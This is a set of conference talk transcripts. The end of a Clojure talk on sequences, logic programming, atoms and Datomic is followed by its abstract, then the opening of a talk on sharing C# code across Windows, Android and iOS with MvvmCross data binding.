reducing plus. Now, the big thing here is not that I work with lists this way. The big thing here is that I work with everything this way. So seqs work with collections. They work with directories on the file system. They work with the contents of files. They work with XML data. They work with JSON data. They work with results coming out of a database. Just to give a slightly larger example, I downloaded the Rotten Tomatoes API yesterday in the hotel room and I asked myself the question, if you look at the movies that are currently topping the charts, what actors are in more than one? So here's how I'd go about doing that. I'd find the JSON API, I'd download it, I'd parse the JSON, I'd walk the movies, I'd accumulate up all the cast members. I would extract their name, because the data structure has in it more than names and I just asked about names. Then I'd get the frequencies. So if I've encountered an actor more than once, I want to have a number that says, oh, I encountered that guy twice or ten times or whatever. And then I'll sort by the highest frequency. So there's my pseudocode. It's eight lines. There's the actual code. So go to the box office, slurp it down, read the JSON, grab the movies out of it, mapcat the abridged cast into a collection, map the name out of that collection, grab the frequencies, and sort by the negative of the second entry in the frequencies table, which is going to sort them from highest to lowest. Notice that I also naturally, as a Clojure programmer, generalize the question. I'm always going to generalize the question and return an infinite sequence, a potentially infinite sequence, because the consumer can then just take the part that they want. Right? They can just go and grab the little bit that they want.
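A hedged sketch of a few of those seq functions, followed by a reconstruction of the box-office query. The Rotten Tomatoes URL and the data.json library are assumptions; the JSON key names follow the talk's description (movies, abridged cast, name), not the actual slide:

```clojure
(first [1 2 3])            ; => 1
(rest [1 2 3])             ; => (2 3)
(cons 0 [1 2 3])           ; => (0 1 2 3)
(take 2 (range 10))        ; => (0 1)
(take 5 (iterate inc 0))   ; => (0 1 2 3 4), the whole numbers
(take 6 (cycle [1 2]))     ; => (1 2 1 2 1 2)
(filter odd? (range 10))   ; => (1 3 5 7 9)
(map #(* % %) (range 10))  ; squares of 0..9
(reduce + (range 10))      ; => 45

;; The box-office question: which cast members appear most often?
(require '[clojure.data.json :as json])   ; assumes the data.json library is available

(def box-office-url "https://api.rottentomatoes.com/...")   ; placeholder URL

(->> (json/read-str (slurp box-office-url) :key-fn keyword)
     :movies
     (mapcat :abridged_cast)
     (map :name)
     frequencies
     (sort-by (comp - second)))   ; highest frequency first
```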
And if you're curious, as of yesterday, nobody was in more than two movies that were in the top 50 from the API, but there were a bunch of people that were in two. Yes? So this is a question that comes up commonly, particularly in a statically typed scenario. So I broke the presentation of the API into two pieces, specifically to try to cover this, and I'll be explicit about it here. All of the collection types have APIs that are about them and return them. So map APIs that return maps, vector APIs that return vectors, set APIs that return sets, and then the sequence abstraction takes you into a different world and says, I want to process this sequentially. So you can do either or. You just have to know which one you're doing. So how do you make a map if you have a vector, for example? So there is an eager map called map V. So map V is, and we don't care about the concrete type. It's not how we roll, right? We care about the semantics. And so map is lazy and map V is eager. But so if you wanted to do, you do want eagerness, though. That's right. And so map V will take you to that data structure. So there are paths to what you want, but they're not the most common and enigmatic thing. But it's not forbidden. You'll want it less once you do this for a while, though. So I also want to feel logical. And I'm not going to go through these examples in any detail, but the point that I want to make is that Closure has been a community that is incredibly friendly to adding logic programming. And so logic programming is not, I'm going to go over and invest in a prologue system, right? It's something that just happens naturally inside of a closure programming. There are at least three fairly well-established libraries for doing logic programming in Closure, Cascalog, CoreLogic, and DatomicDatalog. Cascalog, this looks like a query. This says, walk the people data set, pulling out name and age where age is greater than 40, and then walk the people data set, pulling out name and age where age is greater than 50. As an example of two different queries, this is not super interesting. I just copied it off the website. But the actual thing about this is cool, is that this is backed by Hadoop. So this is an extremely powerful small set of lines of code. This says run a parallel query on data sets that could be spread across tens or hundreds of machines and give me back the results. CoreLogic is, this is the classic monkey needs to move a box to the middle of the room problem implemented in CoreLogic. I would encourage you to go download CoreLogic and take a look at it. The work on CoreLogic has been so appreciated in the logic community that the closure community and the scheme community are starting to have a little love in. And the scheme conference next year is actually going to be co-located with the closure conference. And it's been super exciting to have really high powered academic schemers and particularly reasoned schemers, people who are doing logic programming and scheme, sharing ideas and sharing concepts with the closure community. And then here's Datalog in Datomic. So this is the equivalent of SQL, kind of in our world. You can think of expensive chocolate and related product as views. And when you see variables repeated in a query, that causes a join. The thing I like about Datomic Datalog, and I have a personal interest because I helped build it, is that it is just beautiful to read, to do big jobs compared to SQL, right? 
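For a sense of the shape of that last one, here is a hedged sketch of a Datomic Datalog query. The attribute names are made up for illustration; the repeated ?p variable is what expresses the join:

```clojure
'[:find ?name ?price
  :where
  [?p :product/name  ?name]
  [?p :product/price ?price]
  [(> ?price 100)]]

;; run with something like (d/q the-query (d/db conn)), with datomic.api aliased as d
```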
There's no joining through tables and getting caught in the structure of the join tables and all that sort of muck that you have to do. And all of this stuff is not leaving the language, right? This is not an alternate world that has to be magically brought into the language. This is just people building libraries in the language. Finally, I want to be effective. And I mean the word effective here in the literal sense. I want a program that has effects. This is where functional programming sometimes runs aground. I mentioned before that one of the things people do in functional programming is they sort of wave their hands at this part of it and say, well, you know, you're in Scala, you can say, well, you use functional where it makes sense, and when you need to have an effect, do you have an effect? You do something different. You can take the high road with types and take a monadic approach to effect. Or you can do what closure does, which is to get away from these in place effects by substituting value transitions. So here's where we are today, right? Every little bit of our program is a machine and putting together programs is like assembling things, all of which are moving. So it's no wonder that it's hard to do, right? Composing programs is really difficult because everything is a bunch of moving parts that you're trying to stick together. And this made sense when memory was at 1970s prices. In closure, new memories always use new places. Memory is not that cheap anymore, and we can let garbage collection forget whichever old memories we don't care about. So change is encapsulated by constructors, references refer to a point in time value, and references only see a succession of values. So here we have three values, v1, v2, and v3. We have constructor functions that know how to make values, that maybe take an old value and give you a new one. And then we have atomic succession from one value to another. And then a view of this across time, once upon a time the New York Yankees had this roster, and then somebody got fired and they had that roster, and then two people got hired and they had that roster. Those values are protected by this reference, and observers who are outside that can perceive the identity and remember it and record it, and they can use it in a concurrently safe way. And this is the big one, observers do not have to coordinate. So observers of references or values don't have to coordinate with each other. And people look at this for the first time and go, aren't these just variables? No. They're not just variables. They represent understood semantics of transitions from value to value. If you've ever had to write a lock, then you're doing something different than what we're talking about here. These things do not have to be protected. Here's what it looks like from the API level. I have a reference constructor. In this case, I'm using one called Adam. That makes a reference around the value zero. And then I'm going to take a pure function to do something to the contents of that and some args. And then I have an atomic succession function. So swap says, send a function inside this box, apply the function inside the box, give me back the result. So what will be inside of the Adam after this? It was zero, now it will be 10. And here's mapping that back to the picture. So I have a reference. That reference points to an initial value. I apply a function. We have an atomic succession of the reference, and then it's at a new value. 
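What the transcript renders as "Adam" is Clojure's atom reference type. A hedged sketch of the succession just described:

```clojure
(def counter (atom 0))   ; reference constructor wrapping the value 0

(swap! counter + 10)     ; atomically apply (+ current-value 10) inside the reference
@counter                 ; => 10, deref sees the current value
```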
I can do the same thing with, this model is completely general. I can do the same thing with bigger structures. So now the Adam has in it different data. It's actually the equivalent of a Java bean or something. I'm creating a person, and I'm swapping, associating in a different name for that person. I can also have varying semantics. So now instead of having Adam, I have a different kind of ref called a promise, and a different kind of succession function called deliver. So there's not a single semantic for concurrency. There are five or six or seven, depending on how you count them, and they are all safe. This model also scales all the way up to an entire database. So here, I have, this is not closure anymore. This is datomic, which is built in closure. And I'm connecting to a database and transacting against it. Transact is a succession function, just like all of those other succession functions. It's acid, and you start with a value of the database, you get back a new value of the database. In fact, the return value from a transaction is a future. So you can decide whether you want to wait on the return value or not. And inside that future, you have the old value of the database and the new value of the database. It is this atomic succession model writ large. Now, the obvious question, and this came up on the panel, really, you give me back the entire value of the database? What happens if the database is big? What happens if the database is ginormous? And the answer is that these databases are values. So I don't have to give you back, I can evaluate the database lazy. I don't have to give you back the entire database. What can I give you? I can give you the promise that I still know how to get all the rest of it. And then I can fetch the other pieces as needed. So you can grab these slides after. There's a breakdown reference of the various other reference types, but we're not going to look at them today. The last thing I want is for my software to be pervasive. I don't want to have a private island runtime that I have to go and convince managers to install. I want my systems to run on the platforms that people use. And I think those platforms for language like Clojure are the JVM, JavaScript, and.NET. Clojure was originally written for the JVM, that is the most mature implementation, that's where the most work has gone forth. Clojure CLR came next, but Clojure Script has already passed it probably, if not in maturity, at least in widespread use. And the problem, unfortunately, is, and you know this as well as I do, most of you in this room, that languages on the CLR languish until and unless they're blessed by Visual Studio. So I think that Clojure is backwatered on the CLR because there's a strong commitment to using those tools, and the tools are not available. And I would say it would be great if some of you would take it out for a spin and help make Clojure on the CLR more mature and take it in the direction of use that it has seen on Java. So in conclusion, everybody in the industry almost builds things out of transient data structures that don't compose. This includes Java, C-sharp, relational databases, and no SQL. Clojure solves this with persistence and succession of values. Persistence gives us systems that are composable because the parts don't move around while you're not looking. Value succession gives us a way to actually model state that makes sense in that world. There are other choices. You can go down the Monad Road, for example, if you want. 
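Before the wrap-up, a hedged sketch of the reference types mentioned a moment ago. The person's name here is a placeholder, and the Datomic part is shown only as comments since it depends on a live connection:

```clojure
;; The same succession model over a richer value
(def person (atom {:name "placeholder-name"}))
(swap! person assoc :name "another-name")   ; names are made up for illustration

;; A different reference type with different semantics: promise and deliver
(def p (promise))
(deliver p 42)
@p   ; => 42

;; Writ large in Datomic (sketch only): transact is the succession function,
;; and dereferencing its future gives the old and new database values:
;; (let [{:keys [db-before db-after]} @(d/transact conn tx-data)] ...)
```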
These better semantics allow us to write more powerful and more flexible programs, and those semantics are available on real-world platforms where you want to build and run software. I've included at the end of the slides links to a bunch of references. One of these references, and you can easily Google for this. If you Google for Stuart Halloway presentations, I actually have a wiki that's got slides from all the presentations that I do, and I have left, I believe, four minutes for questions. Yes? You mentioned using an outside tool to use the application of the application. Do you have to use a real-world? Yes, so the question is, what is my outlining tool? Yes, I use org mode and snippets. I totally get that that's not where the world is going to go, and I don't want to be an Emacs user. I'm just forced there by its compelling features. But I understand that, you know, telling someone to use Emacs, if you're not already an Emacs user, did you just tell me to F myself? Right? Because it's a hard learning curve. There's IDE support for closure in all of the mainstream Java IDEs, and it has characteristics that are more familiar and friendly to developers that don't matter very much to me, and what it's missing is general text editing capability, speed, and in particular, a structural editing mode called par edit. So if you've never worked in a language that had a structural editing mode, I would encourage you to do a Google search for par edit, P-A-R-E-D-I-T. That's the big reason that most closure users stick with Emacs once they get hooked on it. Other questions? Those of you who are going to be watching this on camera, I'm in a brightly sunlit room, shading my eyes so I can see people. Yes? So the question is, is it possible, given that the data structures evolve by creating new immutable data structures, can you get back to the old ones? The answer is you could if you wanted to, and it depends. So closure does not, by default, keep the last ten versions of a ref and let you go back to them, but the ref semantics, the model of refs, you could write a ref that had those semantics if it made sense to do in your program. Also, obviously, if you hold on to a value, if you go back and look at my picture of the observers, some of them are looking at old value, as long as you're still looking at it, you're still looking at it. Now, on the durable side of persistent data structures, when you go to Datomic, that works a little bit differently because in Datomic, everything is time-stamped and nothing is ever thrown away in that sense. So in Datomic, you can actually put a filter on the database that shears off data from some time range. So you can say dot as of a month ago, teleport your database back in time a month and query against it there. That's the kind, and it's a great example of the kind of thing that's theoretically made possible by this. Not all the reference types deliver that capability, but it's possible. One last question. Okay. Right, so how does this data structure copying thing work efficiently? So if you imagine a linked list, if I have a linked list with four guys on it and you stick a guy on the front, I don't know you did that, and that's called shared structure. This guy's talking to that guy and nobody cares. The data structures in Datomic are all listed in sideways. They're all trees, and they have the same property. So you have an associative data structure over here that's represented as a tree. You make a change to one thing. 
You get a new tree that's pointing willy-nilly all into the old tree to reach all the old stuff except the one. So the cost you pay is what's called a path copy, and in closure, the paths go five deep. So it's actually, and they are, it's log 32 in instead of constant time, but given that it only goes five deep, it falls out in the wash. In Datomic, on the durable side, those trees are three deep. So they're incredibly wide branching trees, so you don't pay a big penalty for that. That is slower. Those data structure updates are slower than a purely mutable data structure. So on the flip side, you get the speed back on reads, right, because you don't have to coordinate, you don't have to lock. And so if you live in a world where there will be more multi-core processors in the future, closure will become better and betterer. And if you live in a world where multi-core processors are going to be defunct, then the stuff I'm talking about is ridiculous and you should ignore me. So my name is Stuart Halloway. Make sure you remember to fill out eval cards. I have discount coupons for this O'Reilly closure training video and closure stickers. If anybody didn't get those, come and see me after the talk. Thank you very much.
|
Clojure is a powerful dynamic language that compiles to many target environments, including the JVM, JavaScript, and the CLR. In this talk, you will learn how to think in Clojure, and why you should want to. Clojure encourages functional style with persistent data structures, a rich library of pure functions, and powerful processing support via the seq and reducer abstractions. Clojure implements a reference model for state, where references represent atomic successions of values, and change is encapsulated by value and reference constructors. This reference model is more substantive and suitable to application development than individual techniques such as Software Transactional Memory (STM) or actors. The most important single principle behind Clojure is simplicity. Clojure's abstractions are simple and orthogonal. A la carte polymorphism, careful support for names and namespaces, the reference succession model, and a wide selection of small, composable protocols make Clojure programming swift, surgical and accurate. Clojure's expressiveness does not mean that you have to compromise on power. It is an explicit design goal of Clojure to provide access to the power of the underlying platform, and for programmers never to have to "drop down" to the platform level for performance-sensitive work.
|
10.5446/51517 (DOI)
|
Good morning. I think we're ready to go. So let's kick into this. This morning's session, I hope you're all in the right one, is about sharing C-Sharp and it's about using NVVM to do that. We're going to look at all of the modern platforms. So we're going to look at all the Windows platforms and we're also going to look at Android and iOS and we're going to look at C-Sharp across them. There are other modern platforms. There's obviously the Xbox coming along, the Xbox One. And there is also the new modern platforms like, you know, PlayStation 4 is coming along, PlayStation Vita, Google to us. All of these are coming along and all of these will be home for C-Sharp. So what we put in the abstract about what we talk about is all of this. But I know that, actually can I just ask, who here already knows about NVVM and does NVVM kind of a... Okay, so it's pretty much the majority of you. So particularly after all the great sessions that were yesterday from Laurent and Gil and from Rocky today before about NVVM, I'm going to not go too deep into the NVVM introductions. But also with the sessions that are coming up from Craig, I'm not going to go so deep into the introductions into Xamarin iOS and Xamarin Android because you've got plenty of opportunities to do those later. But what I'm going to try and concentrate today is really on the core of what I can bring benefit, I hope, to you guys with, which is NVVM on the modern platforms. And it's about how you can extend portable classes to bring native features. So in particular, I hope you get to leave here today with kind of a good understanding about how you can use NVVM across all the platforms. So what I'd like to do is I'd like to spend the next hour, I'd like to spend the next hour telling a story. And this story is going to start in a very good way. It's like a classic story. And it's going to start a long time ago, actually November in 2011, in a galaxy far, far away called London. And it starts with a project called Social Storm. And it was for the Connect Star Wars game. The idea was to bring an app together that would bring together streams from Facebook, from Twitter, and from Xbox. And it would bring them together on Android, and iPhone, and on Windows Phone. And it would enable kind of this, you know, rich scrolling effect. It would enable mini games. It would enable features on top of your social streams that would get you talking about the game. And the idea was you talk about the game, and then hopefully people would buy the game, they'd hear more about the game. And that was the whole point of this app, this project. So we looked at it from a technical perspective, because I'm a techie. I look at things from a geekie. And we could see all of these layers of things we'd need to write. And we could see, you know, there was service consumption, about network data, and local data, and GPS, and all sorts of things we'd need. There was app logic about, you know, if you're going to a certain place, you do this. If certain tweets came in, you do this. There was all that sort of thing. Then there was UI logic about how you logged in, about how you retweeted, about how you tweeted. And then at the bottom, there was the whizzy stuff. There was the stuff that we really wanted to make sure we had, because we wanted to provide delightful user experiences. So there were animations, there was nice layout, there was nice graphics, there was retina graphics on the right platforms. So there was real, like, concentration on making sure we had that. 
And so we looked at it, and we knew that we, first of all, had to support Windows Phone. Windows Phone meant that we had to support C Sharp, yeah. And then we were asked for native. So we knew for iPhone that the classic route at the time would be go objective C. And then we knew that we had Android. So we knew that we'd have Java. And we looked at this as a bunch of techies. And there were five or six of us involved in this. It was a techie project that was Pavel and Matt and John and a couple of others. And we looked at this, and this didn't fill us with joy at all, because we thought we're going to have three stacks. We're going to have a project where we want to do releases over a period of ten months. We're going to have to maintain these three stacks. We're going to have separate bugs on each platform. We're going to have separate features on each platform. Maintaining them is going to be hideous. So we looked and we saw MonoTouch and we saw MonoDroid. And we thought, can we apply that Xamarin magic? Can we apply the tools that were out there, before Xamarin iOS and Xamarin Android, the MonoTouch and Mono for Android, to turn it all into C Sharp? And then if we can turn it into C Sharp, can we unify this layer? Can we unify those top two layers so that we can share all of the things? So we actually used things like TweetSharp, we used things like RESTSharp, we used common libraries like SQLite, IphoneNet, in order to share those top two layers. And that filled us with joy. We love this sort of thing as techies. We really love to reuse our code and share our code and do things efficiently. We hate to cut and paste. We like cut and paste. We hate copy and paste. But we still looked at this and we still saw all of this UI logic. And we saw that on each platform, we would have this challenge where on Windows, we'd use NVVM because it's what we love. We use the data binding that's in XAML. On the iPhone, we looked and we saw what we had to do since called UI View Controllers. And it's a classic pattern called MVC. Everybody I hope in the room has heard of a Model View Controller. And it's really baked into the Apple approach and to Xcode and to MonoTouch as a result. That's how you do your eyes. And on Android, we saw we had activities. And activities, they are NVC, but actually they're pretty much code behind. So if you've done Windows Forms, it's a bit more like that. And we looked at them and we thought, well, we can't really share that code, which means we can't really test our UI logic as well. And you know, it's going to be hard work and we're going to have to replicate these things. And is there any way that we can unify those layers as well? So we thought if only we could actually just apply NVVM across the board, then if we could do that, then we could share our UI logic. We could test it once. We could have a single set for build and when we could push that out. And so this was where NVVM Cross version one was born back in November 2011. And version one was all about NVVM and it was all about providing data binding across all the platforms. So data binding. Don't worry, there's not too many slides, I promise. Data binding is there and it's what enables NVVM. Again, for those of you who haven't really experienced NVVM before, I hope it's not going to dive in too deep by not going through an introduction to data binding. 
But the idea is that in your UI definitions, whether it's a C-sharp definition of a UI or whether it's a XAML markup or an Android XML markup, you add some additional information that allows you to bind to the view model to the data. And so let's just dive in and build one of these. And we've got a plug-in that somebody in the community has made for us. And it's called the Ninja plug-in. And as you can probably see, I built one last night just to make sure it was working. But let's build a new one and we'll call it NDC. And this plug-in allows us, you know, normally in Visual Studio, we'll go to File New Project. We've got File New Solution because we want to target multiple things at the same time. And so we're just going to check everything on this list. We've got Droid, iOS, Windows Phone, Windows Store. And then let's hit Go. And let's hope I didn't make any mistakes there. And it's going to go off and it's going to generate these things for us. And at the end of this, we should within very short time have all of these projects. So as you can see, we start, it's giving us a nice little read-out. This is Adrien, by all means, send him a virtual beer or whatever to say thank you. This is excellent. And what you get here is you've got a simple project, just a starter project like you would with File New Project Wizard. And in there, we've got a first view model. And this first view model's just got, you know, my property in there, a standard kind of raise property change thing. And so let's just call this MVX NDC to prove it's live. And that's got what you expect of raise property change. Yeah, the coding style here is my coding style. This is obviously a very much style cop type coding style. But it's good because you can use that in your enterprises. If you've got teams and you've got resharper and you've got style cop, it really gives you that unification of feel. And you know, it does it automatically without you having to argue. So that's our basic view model. It's just got one property. And we're going to just get a data bind to it to start with. So let's just dive down and let's see dubpf. So, you know, I guessing that most of you in the room have seen dubpf data binding before. I won't even show you the designer. I can work out how to use this. And it's just the XML. And you can see that normally when you're using the data binding, you'll put in these curly brace syntax, you'll bind to my property and you'll do a two way bind. So we've got two controls here, both bound to my property. And if we hit debug start new, it'll go off and build it. And hopefully we'll get a very ugly dubpf app. But you can see, you know, it says MVX NDC. Really, I should have changed it to say hello NDC. And then we'll be tab away. The data binding happens and everything's updated. So that's your standard dubpf approach. Similarly, we've got a Windows Store and you'll see very similar XML in Windows Store. And if we run that one up, then you'll get, you know, an instant little bit of data binding for Windows Store. All sharing the same view model, all sharing that same code. So again, if it's hello NDC, we tab away and it updates. Similarly, if we have Windows Phone, you'll get exactly the same experience. We'll have to stop some of these debuggers at some point. So I'm just running the Windows Phone. Oops. No, I do need to do one thing here. I've turned off virtualization in my laptop, just because I use it for the Android emulator and an Android emulator uses it, then it means the Windows Phone can't. 
So I just need to turn down to the old style emulator, if it will let me. So if I go back to the Windows Phone 7 emulator and I run it up, then hopefully it will connect to this existing one. And what we should see is you get exactly the same data binding, exactly the same logic. Ah, without a keyboard. So data binding in action there. So those are the traditional platforms. Those are also the new platform for Windows. And you can see that we're sharing code automatically. We're sharing code by default. So if we've got these unit tests here, by default it's just an empty unit test that's generated, but you could put logic in there. Then you can test it. So if you want to test validation of your login credentials, then you're automatically set up when you use this approach to have that tested across all the platforms. So let's move on to the Xamarin platforms as well. And we're going to start with Xamarin.Android. And you can see what's generated here is a default Xamarin.Android project. And just I'm going to go through a bit more detail of these guys because you probably haven't seen an Android project in as much detail before. What we get is we, for every platform we have a setup file. And the setup file really doesn't do very much for a default except it tells where to look for the application and the view models. So it tells it to look in that core assembly where our view models are. We also have some linker please and clue, which is a techie detail which I'm going to pass over. We've got a splash screen and then we've got a views folder. And in the views folder we put our views. Now the views you'll notice are very much like a Windows view, you know, a page in Windows phone or in Silverlight or in Dubf. And there's very little code behind again. Instead of code behind what you get is you get a link to a resource. And these resources are XML files. Now obviously they're not XAML files. Instead of that they put the A and the X the other way around and they're A XML files. And you can see what an A and XR file looks like. There is a design that comes with Android. Let me just stop running because I'm not using so much. There is a designer which I can show you which allows you to, you know, drag and drop. I don't tend to use the designer. I'm kind of an XML guy so I just edit the XML directly. And the XML looks like this. So instead of stack panels what you get is you get a linear layout. It's exactly the same type of layout as a stack panel for those of you who use to XAML. Instead of edit text you get a text box, sorry, instead of text box you get an edit text. And instead of text block which you get in obviously all the way to XAML platforms, you get a text view. And you can see that what we've got in here is we've got normal Android attributes. So we've got things which say layout width, please fill my parent. I hope this is readable enough for even those of you who haven't seen Android before. And for layout height please wrap to whatever the height of my current content is. Text size again should be self-explanatory. But what's special, what we've introduced for MVVM cross are these extra ones, these MVX bind. And what this line says is it says please bind my text property to the my property on the view model. Now you might have expected if you'd come from Windows to see mode equal to way there. But actually I don't like mode equal to way because I always forget it whenever I'm doing XAML. 
And so we've kind of made that the default on an edit text because we've now got control of the binding layer. So we've made that the default. And now let's run this up. Let me just remove what I've just added. And when we run that up it should run in the emulator. And the emulator is already here. It takes a moment to deploy. Build started. Just thinking about it. And then when it deploys we should hopefully see that we get exactly the same experience as we had before. And if we edit text here you'll see that it actually edits in line so it's not that kind of delayed tab away. But you can see that it's live data binding going on. So there's a text view and an edit text bound together. So the final platform that we've got in the package here is also iOS. And unfortunately I can't run iOS live here because I did bring the Mac so I could run it and connect across a remote desktop. But unfortunately the network here won't let me connect on the ports that I want to connect. So instead of that I've pre-canned the demo part of this. I recorded it in the hotel last night. But what you'll see inside the iOS is you'll see exactly this, a very similar type of setup in terms of project. So you'll see we've got a setup. You see we've got that odd linker please include file. And you'll see that we've kind of just got some default files like app delegate and main which you get with a normal one-of-touch product. And then inside the views you'll see that we have a couple of views again. And if you look in first view then instead of having XML here we're actually doing our layout here by code. And this is the way quite a lot of iOS UIs are built in code. And you can see that what we do is we lay out and we have a UI label. So instead of a text block we've got a UI label. Instead of a text view we've got a UI label. And we put its location at this rectangle. We add it to ourselves. We then get a text field. And then there's this code here. And this code here does the binding. And you can see I hope as you read through we've got a fluent syntax. And actually it's a little bit borrowed this fluent syntax from a guy sitting in the front row there, Paul. It's a bit inspired by it by the work they've done in Reactive UI. And it enables us to bind to various properties on the view model in a very straightforward way. If you'd rather you can do it using text instead of using this kind of expression based syntax. But this is the way we do it by default. And so I'll just show you what this looks like when it runs up. This is what I recorded last night. And hopefully you'll see. So this is running inside the Mac. I just couldn't get them to remotely connect. Recorded in Oslo, recorded in NDC. And when you run this up, when this person who ever is stops wittering on the screen cast. When it runs up inside an emulator, then you'll see that the data binding is exactly the same experience as you had before. So if you edit the top one, the bottom one goes. And this gives you the testability of your UI because you can test that view model and you can test it across all your platforms. So that's binding a simple property. What else can you do? Well, so if you're used to using NVVM, then no doubt you'll think about things like, well, can I have a value converter? So let's build a value converter. And we've made portable value converters in NVVM Cross. And in order to build a value converter, what you do is you just declare one. So let's take the string and let's add a length value converter. Converter. 
And oops, I missed a class keyword. By all means, join in the big programming exercise, the pair programming we're doing here. And we will add, so it's going to inherit from something called an NVX value converter. All of our classes inside NVVM Cross start with the letters NVX, which is absolutely brilliant until you come to document them. And then you zoom through A to A to A2O and you get there and you get to M, A2O. I don't know my alphabet. You zoom up to M and then you have to start documenting M and it goes all to pop because every class starts with M. But we've got this NVX value converter and we'll import the namespace. And what we're going to do is we're going to convert a string to an int and then we'll implement it. We implement it by overriding the convert method. So if you're used to value converters, you'll just notice this is the same as a live value converter, except we've got no objects here, we've got strong types. And all I'm going to do is return value.length. And then I can build that. And that value converter will now be available in all my projects because it's portable. So it's available in all these projects down here. So for example, in first view in this Android, or I'm going to open it in the other editor, I can, for example, add another text view at the bottom here. Let's do it. And this text view I'm going to bind and all I'm going to do is I'm going to apply a converter and this converter is called length. And the reason it's called length is because over here it started with the word length. We use convention and we use a bit of reflection to find these things. And so now when we run up the Droid project, we should see that we'll have another text field that will show us the length of the current text. So there you go. We've got the things bound together. And again, if I start editing, then you'll see that everything updates all in sync. And that's really useful if you need to enable buttons as you change things. If you need to perhaps display how old you are as you're entering a date of birth, that type of thing, it's a really great way of putting things together. You can also combine multiple things together in a value converter. So if you need to take a first name and a gender and a last name and put them together to give a full title, you can do that using this type of approach. So that's value converters. What else do you get inside view models? Well, quite often you get a command. And so we'll add a command. And this command will be the NDC command. And so we're going to add in an NDC command. And I'll just do this in line. So if you're used to something like NVVM lights, then you'll have a relay command. We don't have a relay command. We have an NVX command, but it's a similar type concept. And when this command runs, what we'll do is we'll set my property to be equal to Bazinga. I should know some Norwegian really, so I can actually do this in local. Is Bazinga Norwegian? I don't think so. So as soon as we've added NDC command, then that's going to be available. And if we want to bind that to a UI element, then we can do it very straightforwardly, for example, by adding a button. And let's just copy some XML syntax so we can get there quite quickly. And on this button, I can bind the text to the button as well if you want to. I can bind it to the length as well. So we can apply multiple things. And then I'll also bind in the click event on the button. So if you're used to using XAML, you probably might have a behavior. 
Or if you're lucky, you've got a command on the control. Here we've got these events that are there. And we just bind directly to the event delegate. So the click event, we're going to bind to NDC command. And I'll run that up. And hopefully we'll see in the emulator that now we'll get a button. That button will have the text, which is going to be my property.length. And when we click it, we'll clear the text. Maybe the end of my demo has just, let me just see what was there. Why is it not loading for me? That's not part of the demo. Why is that happening? Anyone spot on the deliberate error as I typed through that? Let me remove this because it's not normally in there. But I don't see any errors that I made. Anyone spot anything? No, I do know, I think. I think the problem is at the moment that my project probably isn't set up correctly. So I probably haven't rebuilt my core. It's just in the configuration. So there's still a few little bugs to iron out in that new solution wizard. But I'm guessing if I rebuild it and then build, it'll run. If not, then I'll cut this out of the video afterwards. So there it goes. So there's your binding. If you change the text up here, then you'll see that everything updates. There's no icky find view by ID or get thing by name or get a tag or try and link all your code together and then do that. Everything updates. If you hit that, then the text changes. So that's data binding. If you wanted to do the same thing in Windows, then I hope most of you here will know about XAML. And if not, then as I said, there were some excellent presentations yesterday about that. If you want to do it in IOS, then what you would have to do is in FirstView, you would have to add some additional bindings and some additional UI controls. So for example, if we wanted to apply the converter here, then we'd do it using a with conversion. And we would just put the name in, like length, and it would work. If you wanted to bind to the command, then what you would do is, for example, if you wanted to have for the tap on the label, then you would actually put the name in like that because we haven't got a fluent expression syntax for that at the moment. So you put in that when it taps, I would like to bind to the NDC command on the view model. And you can see how IntelliSense helps you there. You can see how you can build it out. And also if you refactor that, it will refactor across the entire project solution. So that's data binding. I hope that was vaguely followable. Sorry about the mistake halfway through with not rebuilding. And you can see that for simple properties, we get, you know, Windows at the top, Android in the middle, and iOS at the bottom. And I hope that's followable for most people here. If you want to apply a value converter, then that's the way you do it. And I believe that our syntax is much neater and nicer than kind of the curly brace one that Windows has by default. And then if you want to bind to commands, then you can do it very straight forwardly. So that was MVVM cross V1. And that was the social storm project. And we were very lucky and very grateful to Microsoft and to McCann London to allow us to open source what we produced. And V1 was brilliant. It was absolutely amazing to develop these things. And we did have changing customer requirements all the time, which meant we wanted to refactor. And we did have changing Twitter APIs all the time, which meant that we were continually fighting builds. 
So we really, really benefited from being able to share all this code. Because if we had to develop those sacs separately for Android and iOS and Windows Phone and we had to cope with them, it would have been not so pleasant. However, V1 did have a slight dark side. And the dark side was that in V1, we didn't have a portable class library layer. So we had all this file linking going on, which meant we had separate files for every solutions round. So we had separate files for Android and separate files for iOS and separate files for Windows Phone. It was also just a bit fat as a library because it was a V1. And it wasn't so easy to extend or to play with because, you know, it was a V1. So what we needed really inside MVVM cross was we needed a hero. And I don't know where you guys look for heroes. I don't know where heroes normally hang out here in Norway. But we always look for heroes inside Visual Studio. And we found one. And our hero we found in the new project wizard. And it was the portable class libraries. And particularly version two that kind of came out in late 2011, early 2012. And what a portable class library is, is when you choose new, it allows you to target multiple platforms. And you get this little dialogue. And you know, you can say that I don't want to just target WPF applications. I don't want to just target Windows Store. I don't want to just target Windows Phone. What I'd like to do is I would like to target all of them. Now, obviously by targeting all of them, you do get a reduced API set because many of these things, you know, are based on the compact framework. And the idea of the compact framework is it's compact. Yeah, it's got a smaller memory space. So you don't get every API. But by selecting these, this reduced set, you can develop one project that will span everything. So this is what you get by default. Particularly thanks to John Popp's at Xamarin, who wrote a little blog post, which is very helpful. We found a way of getting Mono for Android and Mono for Touch in there. And this is well documented now how to do this. And I think official support for PCI is coming anytime in the next two weeks from Xamarin. So it's going to be brilliant. And once you've done that, then you'll get this API set. And this is taken from the Microsoft documentation. And if you're just targeting the things we're looking at, then what you get is you get this feature set. And so you'll get core, which is things like system.datetime and system.string and all the stuff that you use all the time. And it's really useful having that. Yeah. Don't, you know, underestimate how much value you'll get from having a single datetime and having a familiar datetime to yourselves. Because if you haven't got that, then on iOS, you'll have to know about NSDate, which is actually a long under the covers. And then you have to kind of use a calendar object to get NSDate components out, which you pass a bit. Anyway, you don't want to go there. And you'd have to know about Java. And Java is like a little peculiarity that most things are long under the covers. And there are different types of long. And if you add them together in the wrong way, it goes wrong. And then when you use a month, it's zero base rather than one base. So your code, when you cut and paste between different platforms, it'll go wrong. But it's really great to have that. Another thing that's great to have there is link. It's just brilliant. You know, we all love link. It makes it so much more productive. 
